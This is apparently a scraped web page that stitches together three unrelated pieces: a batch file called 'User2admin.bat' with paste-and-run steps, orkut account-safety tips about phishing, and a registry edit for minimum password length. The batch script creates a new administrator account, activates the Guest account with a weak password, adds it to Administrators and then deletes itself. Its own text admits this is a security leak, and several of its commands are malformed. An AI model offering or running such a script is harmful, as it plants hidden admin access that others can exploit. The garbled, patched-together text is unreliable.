Do It At Your Own Risk.
All you need to do is copy the code below, copy/paste it into Notepad and save it as User2admin.bat on your desktop.
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Double-click the file to execute or type the above-given code in Command Prompt.
Note: this also creates a net account which is also accessable through nets open port (basically it’s a security leak).
These days many users' accounts can be compromised through social engineering techniques such as phishing schemes or malicious scripts and programs guised as being legitimate, and lose their usernames and passwords. Here is a simple guide to keep your account secure:
- The orkut team will never ask for your username and password, if you receive an email asking for those details don't give them to anyone; it wasn't sent by us.
- Be aware of every link that you open: you might be redirected to a page where you'll be asked to install a really cool feature which is in fact a malicious program that will give out your private information
- If you're logged into orkut, and after clicking on a link, you're prompted to login again, check the URL; if it's not www.orkut.com, don't login! Some links redirect you to phishing pages, where the page is absolutely identical to the real orkut one, but your account information will be sent to the attacker.
- Always logout from orkut when you want to finish your session, and if you are on a public computer, clear you cache and cookies before leaving-this is really important!
- Change you password several times a year, and when you do, use a password that's easy to remember but difficult to guess.
- Don't write your password anywhere!
- Don't share your account with your soulmate. In the unfortunate event that your relationship ends this can cause you a lot of problems.
These safety tips are not unique to orkut. You should follow the same advice for email sites, or any other site that requires a username and password.
I hope this friendly reminder will help you maintain your beloved profile in peace :)
1.Open RegEdit
2.Go to
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies\ Network
3. Now, choose the Edit/New/Binary value command and call the new value MinPwdLen. Press Enter twice and Assign it a value equal to your minimum password length.